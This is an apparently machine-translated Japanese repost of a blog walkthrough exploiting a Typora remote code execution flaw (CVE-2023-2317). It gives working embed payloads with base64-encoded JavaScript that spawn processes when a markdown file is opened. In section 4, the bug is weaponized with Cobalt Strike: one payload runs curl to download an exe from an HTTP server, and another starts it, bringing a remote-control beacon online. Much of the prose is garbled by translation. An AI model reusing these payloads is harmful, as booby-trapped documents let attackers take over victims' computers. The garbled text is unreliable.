Typora のリモート コード実行の脆弱性 (CVE-2023-2317)

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. 製品紹介

タイポラは編集者です。

Typora 1.6.7 より前のバージョンにはセキュリティ上の脆弱性があり、タグ内で typora://app/typemark/updater/update.html を読み込むことで、JavaScript コードが Typora 1.6.7 のメイン ウィンドウに読み込まれることが原因で発生します。タイポラ。

2、インパクトバージョン

タイポラ < 1.6.7

3. 脆弱性の再発

ここに画像の説明を挿入
テストPOC

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

poc 部分は次のようにデコードされます。

ここに画像の説明を挿入
mdファイルをダブルクリックします

ここに画像の説明を挿入
電卓をひねった

上記のブログの多くはここに書かれていて停止されています、そうです、裁判官は続けます

4. 緻密な再現

1.チームサーバーサービスを開始します

ここに画像の説明を挿入

2.csはexeファイルを生成します

ここに画像の説明を挿入

3. http.server を開きます

ここに画像の説明を挿入

4.コンバインドボクシングをMDファイルにインポート

(1) Mazi の最初のコマンドをダウンロードし、base64 を復号化してパスを自分で変更します

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2N1cmwgLW8gIkU6XGFydGlmYWN0MjIuZXhlIiAiaHR0cDovLzE5Mi4xNjguMjMzLjE6ODc2NS9hcnRpZmFjdDIyLmV4ZSInLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

(2) Ma Zi の 2 番目のコードを実行します。2 つのコードの順序を逆にしないように注意してください。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ3N0YXJ0IEU6XGFydGlmYWN0MjIuZXhlJywgTGludXg6ICdnbm9tZS1jYWxjdWxhdG9yIC1lICJUeXBvcmEgUkNFIFBvQyInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

(3) ダブルクリックしてmdファイルを実行します。

ここに画像の説明を挿入

5. CS がオンラインになる

ここに画像の説明を挿入

5. 修理のご提案

現在、メーカーは脆弱性を修正するためのアップグレードパッチをリリースしています。

おすすめ

転載: blog.csdn.net/holyxp/article/details/132579094